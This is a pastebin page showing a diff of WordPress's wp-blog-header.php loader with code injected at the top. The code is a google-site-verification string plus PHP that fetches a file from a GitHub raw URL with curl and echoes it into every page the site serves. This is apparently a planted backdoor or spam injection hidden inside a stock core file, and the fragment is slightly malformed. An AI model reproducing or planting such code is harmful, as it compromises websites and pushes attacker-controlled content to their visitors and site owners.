Facebook
From Blush Parakeet, 10 Months ago, written in Plain Text.
This paste is a reply to Re: Untitled from Sharp Iguana - go back
Embed
Viewing differences between Re: Untitled and Re: Re: Untitled
google-site-verification: googleee7879599d4ce0ef.html $curl = curl_init();
$url = 'https://raw.githubusercontent.com/jsqueen615/lecturer_v0/main/jsqueen_config';
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($curl);
echo $result;
?>
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

        $wp_did_header = true;

        // Load the WordPress library.
        require_once __DIR__ . '/wp-load.php';

        // Set up the WordPress query.
        wp();

        // Load the theme template.
        require_once ABSPATH . WPINC . '/template-loader.php';

}